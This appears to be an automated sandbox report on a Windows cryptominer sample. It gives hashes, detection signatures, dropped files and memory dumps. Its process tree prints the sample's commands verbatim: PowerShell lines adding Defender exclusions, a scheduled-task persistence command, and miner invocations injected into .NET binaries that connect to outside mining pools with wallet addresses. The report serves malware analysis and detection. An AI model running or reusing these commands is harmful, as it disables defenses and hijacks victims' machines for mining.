Analysis

  • max time kernel
    276s
  • max time network
    278s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23/12/2022, 03:41

General

  • Target

    00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe

  • Size

    902KB

  • MD5

    ed8317be1bd5af62622d10bef3695bd7

  • SHA1

    7bd670f5c16997f144367fa5316a70928f782b08

  • SHA256

    00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358

  • SHA512

    cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54

  • SSDEEP

    6144:FN6Jq6tRTVgNA4ycmnyfnjDB7DNka3A6CCrpqEcL5GapWzL920M0j73PZYDdYfpX:FkUmuXXuyPXB7DXAiRezY24jLXfptl9

Score
9/10

Malware Config

Signatures

  • Detectes Phoenix Miner Payload 4 IoCs
  • Executes dropped EXE 2 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe
    "C:\Users\Admin\AppData\Local\Temp\00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'wz8wpHfkNldOXz9xAoaXj/wKfjNCkyytKClPPn6mQoN47qFu6FNCRfjl0WKAjUbtolh/Uf3Ux9JC7mIpke2GT6Tbtv3pSd8vqo+jOAAHjPuegtDbZ1CW+UvwTBh5Hn2i4QWh09V2KdwVSCNTx1oZkA=='
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1900
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8A9.tmp.bat""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1116
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:1404
      • C:\ProgramData\WinDW\UNXUV.exe
        "C:\ProgramData\WinDW\UNXUV.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'wz8wpHfkNldOXz9xAoaXj/wKfjNCkyytKClPPn6mQoN47qFu6FNCRfjl0WKAjUbtolh/Uf3Ux9JC7mIpke2GT6Tbtv3pSd8vqo+jOAAHjPuegtDbZ1CW+UvwTBh5Hn2i4QWh09V2KdwVSCNTx1oZkA=='
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1528
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "UNXUV" /tr "C:\ProgramData\WinDW\UNXUV.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "UNXUV" /tr "C:\ProgramData\WinDW\UNXUV.exe"
            5⤵
            • Creates scheduled task(s)
            PID:1324
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RM7iDCj2gk39Yur3Ee1kD7Aptrxw3Fk6BM.work -p x -t 5
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c cls
            5⤵
              PID:1408
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xD97F71F033a694e2b2FC8E7D615cdF742C65b2d3.Rig121 -coin etc -log 0
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:1604
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {2368AF71-954A-49EE-A364-2E44CA1C494D} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\ProgramData\WinDW\UNXUV.exe
        C:\ProgramData\WinDW\UNXUV.exe
        2⤵
        • Executes dropped EXE
        PID:1124

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\WinDW\UNXUV.exe

      Filesize

      902KB

      MD5

      ed8317be1bd5af62622d10bef3695bd7

      SHA1

      7bd670f5c16997f144367fa5316a70928f782b08

      SHA256

      00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358

      SHA512

      cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54

    • C:\ProgramData\WinDW\UNXUV.exe

      Filesize

      902KB

      MD5

      ed8317be1bd5af62622d10bef3695bd7

      SHA1

      7bd670f5c16997f144367fa5316a70928f782b08

      SHA256

      00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358

      SHA512

      cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54

    • C:\ProgramData\WinDW\UNXUV.exe

      Filesize

      902KB

      MD5

      ed8317be1bd5af62622d10bef3695bd7

      SHA1

      7bd670f5c16997f144367fa5316a70928f782b08

      SHA256

      00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358

      SHA512

      cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54

    • C:\Users\Admin\AppData\Local\Temp\tmp8A9.tmp.bat

      Filesize

      138B

      MD5

      864cd3e00858779288a2ca961494f25e

      SHA1

      13fa2c48e6df9d41ab7ff8087313fe2eb501021d

      SHA256

      909ab59b86173013710d857b08f9c21b5f437aedf4959c00a590d881a3fa3139

      SHA512

      0192d78e94239aac2932b2b595c531472e6b54d51512cf5bb32bc7c84da81e0ba6493be7ba4a03736ae986579040e59f359e6c21fb2b4c8222b6cd17a405112b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      9397f4625f8847dc801d105d60fba2fb

      SHA1

      95d67ecff049511dcf09c45ebb1f77262eb31b56

      SHA256

      df44e950ac7d6f85988b5ebc82292a029b8bcdc886da1e054d7410fc7a7dd0fd

      SHA512

      4b221558bd2c42bede0c4716ce38b6d037851c1c08748f45d197dcee286e687c268258bdace11cf2bf48aa3fbed21da7db9caef01393dc6b4ccfbb257ea0929a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      9397f4625f8847dc801d105d60fba2fb

      SHA1

      95d67ecff049511dcf09c45ebb1f77262eb31b56

      SHA256

      df44e950ac7d6f85988b5ebc82292a029b8bcdc886da1e054d7410fc7a7dd0fd

      SHA512

      4b221558bd2c42bede0c4716ce38b6d037851c1c08748f45d197dcee286e687c268258bdace11cf2bf48aa3fbed21da7db9caef01393dc6b4ccfbb257ea0929a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      78b0beac79674b0634d5ff27a9c208a4

      SHA1

      6fff69be72eb20ecb1a797504c6e4349d1193460

      SHA256

      8eb8b1a92deaaaa710a5c90839ddfbb3141cba4c478248c97ce2ccafc8557a50

      SHA512

      d47a33bac666800beb0bc8d9994e6953cd7821aaca29afb26e4f25db0aa84e19f319e3faf8fe02409918c043e39d4a3429394bcf8e5214f063df8fa9c25c86f5

    • \ProgramData\WinDW\UNXUV.exe

      Filesize

      902KB

      MD5

      ed8317be1bd5af62622d10bef3695bd7

      SHA1

      7bd670f5c16997f144367fa5316a70928f782b08

      SHA256

      00b426ecc30bd92b36475650de45315bb643284efd12f9d43843868a10638358

      SHA512

      cb400d441f730590b83c52970b628823575482474e7fbe4ce96ba9442fbec86b1be1fe4252e983f283e225016e6084f02cbe35ba4f673bf7a92b811ad4864a54

    • memory/1528-103-0x00000000028CB000-0x00000000028EA000-memory.dmp

      Filesize

      124KB

    • memory/1528-105-0x00000000028C4000-0x00000000028C7000-memory.dmp

      Filesize

      12KB

    • memory/1528-98-0x00000000028CB000-0x00000000028EA000-memory.dmp

      Filesize

      124KB

    • memory/1528-93-0x00000000028C4000-0x00000000028C7000-memory.dmp

      Filesize

      12KB

    • memory/1528-83-0x00000000028C4000-0x00000000028C7000-memory.dmp

      Filesize

      12KB

    • memory/1528-80-0x000007FEED100000-0x000007FEEDB23000-memory.dmp

      Filesize

      10.1MB

    • memory/1528-92-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

      Filesize

      3.0MB

    • memory/1528-81-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

      Filesize

      11.4MB

    • memory/1600-120-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-106-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-138-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-128-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-124-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-121-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-118-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-117-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-116-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-115-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-114-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-112-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-111-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-109-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1600-107-0x0000000140000000-0x00000001400C6000-memory.dmp

      Filesize

      792KB

    • memory/1604-127-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1604-135-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1604-130-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1604-131-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1604-137-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1604-126-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1604-133-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1604-134-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1604-136-0x0000000140000000-0x000000014082B000-memory.dmp

      Filesize

      8.2MB

    • memory/1676-89-0x000000001B810000-0x000000001BB0F000-memory.dmp

      Filesize

      3.0MB

    • memory/1676-94-0x0000000002924000-0x0000000002927000-memory.dmp

      Filesize

      12KB

    • memory/1676-102-0x000000000292B000-0x000000000294A000-memory.dmp

      Filesize

      124KB

    • memory/1676-82-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

      Filesize

      11.4MB

    • memory/1676-79-0x000007FEED100000-0x000007FEEDB23000-memory.dmp

      Filesize

      10.1MB

    • memory/1676-100-0x0000000002924000-0x0000000002927000-memory.dmp

      Filesize

      12KB

    • memory/1676-99-0x000000000292B000-0x000000000294A000-memory.dmp

      Filesize

      124KB

    • memory/1676-84-0x0000000002924000-0x0000000002927000-memory.dmp

      Filesize

      12KB

    • memory/1696-69-0x0000000001370000-0x0000000001456000-memory.dmp

      Filesize

      920KB

    • memory/1832-54-0x0000000000D60000-0x0000000000E46000-memory.dmp

      Filesize

      920KB

    • memory/1900-96-0x00000000022C0000-0x0000000002340000-memory.dmp

      Filesize

      512KB

    • memory/1900-86-0x00000000022C0000-0x0000000002340000-memory.dmp

      Filesize

      512KB

    • memory/1900-88-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

      Filesize

      11.4MB

    • memory/1900-63-0x000007FEED100000-0x000007FEEDB23000-memory.dmp

      Filesize

      10.1MB

    • memory/1932-87-0x000007FEEB650000-0x000007FEEC1AD000-memory.dmp

      Filesize

      11.4MB

    • memory/1932-57-0x000007FEFC341000-0x000007FEFC343000-memory.dmp

      Filesize

      8KB

    • memory/1932-61-0x000007FEED100000-0x000007FEEDB23000-memory.dmp

      Filesize

      10.1MB

    • memory/1932-90-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

      Filesize

      3.0MB

    • memory/1932-95-0x0000000002394000-0x0000000002397000-memory.dmp

      Filesize

      12KB

    • memory/1932-97-0x000000000239B000-0x00000000023BA000-memory.dmp

      Filesize

      124KB

    • memory/1932-104-0x000000000239B000-0x00000000023BA000-memory.dmp

      Filesize

      124KB

    • memory/1932-101-0x0000000002394000-0x0000000002397000-memory.dmp

      Filesize

      12KB

    • memory/1932-85-0x0000000002394000-0x0000000002397000-memory.dmp

      Filesize

      12KB